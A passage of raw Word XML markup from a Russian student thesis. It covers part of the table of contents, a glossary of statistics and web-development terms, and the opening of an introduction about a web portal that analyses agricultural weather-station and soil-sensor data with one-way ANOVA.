        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5874EDBC" w14:textId="3FD300FF" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709249" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ПРИЛОЖЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Б</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> (</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>листинг</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>файла</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> AccountService.cs)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709249 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18D12356" w14:textId="1ED8D353" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709250" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve">ПРИЛОЖЕНИЕ Г (Содержимое файла работы дисперсионного анализа </w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Anova</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>cs</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709250 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>99</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A456326" w14:textId="5614956C" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709251" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ПРИЛОЖЕНИЕ Д (Модульные тесты для проверки работоспособности алгоритма дисперсионного анализа)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709251 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>114</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42F97887" w14:textId="3057615B" w:rsidR="00CC2EBA" w:rsidRDefault="00B93EC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709252" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ПРИЛОЖЕНИЕ Е (Справка о внедрении программного продукта на предприятии)</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709252 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>116</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79721EE9" w14:textId="7791B712" w:rsidR="0093378B" w:rsidRPr="001C0E55" w:rsidRDefault="00EB2F89" w:rsidP="002F67A2">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A18B7BF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="114DF1D5" w14:textId="43DBBE00" w:rsidR="0093378B" w:rsidRDefault="008F05DC" w:rsidP="00892905">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ГЛОССАРИЙ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76432AE1" w14:textId="1CBA4293" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t xml:space="preserve">Математическая статистика – наука, разрабатывающая математические методы систематизации и использования </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>эмпирических</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> данных для научных и практических выводов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC44A52" w14:textId="33BF3003" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>Дисперсионный</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>анализ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANOVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ANalysis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Of</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VAriance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve">) – </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>метод</w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1" w:rsidRPr="00C97DD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>в математической статистике, направленный на поиск зависимостей в экспериментальных данных путём исследования значимости различий в средних значениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63FC1C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>Генеральная совокупность – совокупность всех потенциально возможных вариантов, которые можно получить при одинаковых условиях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBB396" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>Выборка – данные, которые получены при наблюдениях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB54D2B" w14:textId="5EECF2B4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t xml:space="preserve">Репрезентативность – понятие, которое говорит, насколько показательна выборка, </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>соответствует ли выборка генеральной совокупности</w:t>
      </w:r>
      <w:r>
        <w:t>. Выборка считается репрезентативной, если в ней учтено множество параметров и она достоверно отражает генеральную совокупность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E55FE" w14:textId="567DA233" w:rsidR="0093378B" w:rsidRPr="00A663BC" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t xml:space="preserve">Распределение – показатель, описываемый через математические формулы. Он показывает частоту, с которой в выборке встречаются разные </w:t>
      </w:r>
      <w:r w:rsidR="00C97DD1">
        <w:t>значения</w:t>
      </w:r>
      <w:r>
        <w:t>. В результате можно сделать вывод о том, каких вариантов данных больше</w:t>
      </w:r>
      <w:r w:rsidR="002606B4">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002606B4">
        <w:t>к</w:t>
      </w:r>
      <w:r>
        <w:t>аких меньше – что больше или меньше распространено внутри выборки. Если она репрезентативная, это поможет сделать выводы и о генеральной совокупности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115D65A" w14:textId="154FA3E1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t xml:space="preserve">Статистический пакет – программный продукт, предназначенный для статистической обработки данных. Как правило в статистический пакет входят средства для проведения описательных статистик, дисперсионного и регрессионного анализа, </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t xml:space="preserve">а </w:t>
      </w:r>
      <w:r>
        <w:t>также инструменты для отображения результатов исследования, такие как графики и таблицы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD15CE" w14:textId="5463CE5B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="007E512A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="007E512A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>«модель-представление-контроллер» (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r w:rsidRPr="007E512A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidRPr="007E512A">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:t>подход к организации кода, основанный на принципе разделения отве</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>тс</w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:t xml:space="preserve">твенности между тремя компонентами – моделью, она отвечает за </w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:lastRenderedPageBreak/>
        <w:t>хранение и обработку данных программы, представлени</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:t>, оно определяет внешний вид приложения и обеспечивает пользовательское взаимодействие, и контроллер</w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00F61E3D">
        <w:t>, он управляет логикой приложения и контролирует взаимодействие между моделью и представлением.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035CE89E" w14:textId="2597FDC5" w:rsidR="00776CB4" w:rsidRPr="00776CB4" w:rsidRDefault="00776CB4" w:rsidP="008E6783">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Representational</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transfer</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>) – «</w:t>
      </w:r>
      <w:r>
        <w:t>передача</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>репрезентативного</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>состояния</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>» «</w:t>
      </w:r>
      <w:r>
        <w:t>прикладной</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>программный</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>интерфейс</w:t>
      </w:r>
      <w:r w:rsidRPr="00776CB4">
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - архитектурный стиль взаимодействия компонентов распределённого приложения в сети. Представляет собой согласованный набор ограничений, учитываемых при проектировании веб-приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6D9A8" w14:textId="02CB0F53" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>Модель продукционного процесса – программа для ЭВМ, которая описывает поведение агроэкосистемы в зависимости от внешних условий (погоды, технологии возделывания, почвы, культуры).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438DD99" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>Сервер – персональный компьютер, который выполняет сервисные задачи без непосредственного участия человека.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F815572" w14:textId="43179B20" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>Автоматическая цифровая метеостанция – цифровое устройство с набором датчиков, которые измеряют агрометеорологические характеристики окружающей среды с последующей передачей собранной датчиками информации по беспроводной сети на сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB7F39F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00573B46" w:rsidRDefault="0093378B" w:rsidP="008E6783">
      <w:r>
        <w:t>БД – База данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09E251" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:sectPr w:rsidR="0093378B" w:rsidSect="000671FA">
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="6"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693C292C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc161568200"/>
      <w:bookmarkStart w:id="4" w:name="_Toc162709227"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t>ВВЕДЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="44045E9E" w14:textId="0B39ACF1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="006612A3">
      <w:r>
        <w:t xml:space="preserve">Современные технологии в области информатики и компьютерных наук с течением времени активно интегрируются с человеческим бытом, </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t>а также</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в области прогнозирования и моделирования бизнес и научных процессов. Возможности современных компьютерных систем позволяют собирать, хранить и обрабатывать большие массивы данных и, в конечном итоге, анализировать их и находить закономерности в различных эмпирических наблюдениях. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AEA0DF" w14:textId="5C8713B4" w:rsidR="0093378B" w:rsidRPr="00BD5112" w:rsidRDefault="0093378B" w:rsidP="00181E5B">
      <w:r>
        <w:t>Также помимо проведения самого статистического анализа необходимо предоставить пользователю наглядные результаты для того, чтобы он непосредственно смог проинтерпретировать результаты и сделать выводы</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc122277543"/>
      <w:r w:rsidR="00BD5112">
        <w:t>, в частности</w:t>
      </w:r>
      <w:r w:rsidR="00AA0AC4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BD5112">
        <w:t xml:space="preserve"> в предметной области сельского хозяйства, автоматизировав мониторинг агроэкосистемы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09150931" w14:textId="582F1BE3" w:rsidR="00502C9D" w:rsidRDefault="00502C9D" w:rsidP="00181E5B">
      <w:r>
        <w:t xml:space="preserve">Такого рода задачу можно решить, создав клиент-серверный интернет-портал, который будет хранить актуальную информацию об агроэкосистеме на конкретном, интересующем </w:t>
      </w:r>
      <w:r w:rsidR="004E1DBB">
        <w:t>агронома-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">исследователя поле. На портал можно будет зайти с любого цифрового устройства, на котором установлен любой веб-браузер и на котором присутствует доступ в интернет. Таким образом </w:t>
      </w:r>
      <w:r w:rsidR="00BF50CB">
        <w:t>исследователь сможет в любое время и в любом месте ознакомиться с текущей ситуацией на поле и сделать выводы на основе этой информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E842C" w14:textId="38CC57A1" w:rsidR="0093378B" w:rsidRPr="00464AEF" w:rsidRDefault="0093378B" w:rsidP="005019EA">
      <w:r w:rsidRPr="00464AEF">
        <w:t xml:space="preserve">Объектом </w:t>
      </w:r>
      <w:r w:rsidR="00E8167C">
        <w:t xml:space="preserve">представленного </w:t>
      </w:r>
      <w:r w:rsidRPr="00464AEF">
        <w:t>исследования явля</w:t>
      </w:r>
      <w:r>
        <w:t>ются</w:t>
      </w:r>
      <w:r w:rsidRPr="00464AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>данные автоматической цифровой метеостанции и почвенных датчиков-влагомеров, требующие анализа и визуализации</w:t>
      </w:r>
      <w:r w:rsidRPr="00464AEF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59015AE2" w14:textId="685CA06B" w:rsidR="0093378B" w:rsidRPr="00BD5112" w:rsidRDefault="0093378B" w:rsidP="005019EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464AEF">
        <w:t>Предметом исследования явля</w:t>
      </w:r>
      <w:r>
        <w:t>ются</w:t>
      </w:r>
      <w:r w:rsidR="00BD5112" w:rsidRPr="00BD5112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5112">
        <w:t>методы обработки данных для проведения анализа,</w:t>
      </w:r>
      <w:r w:rsidR="00AA0AC4">
        <w:t xml:space="preserve"> в частности,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> алгоритм однофакторного дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidR="00BD5112" w:rsidRPr="00BD5112">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24087435" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc161568201"/>
      <w:bookmarkStart w:id="7" w:name="_Toc162709228"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
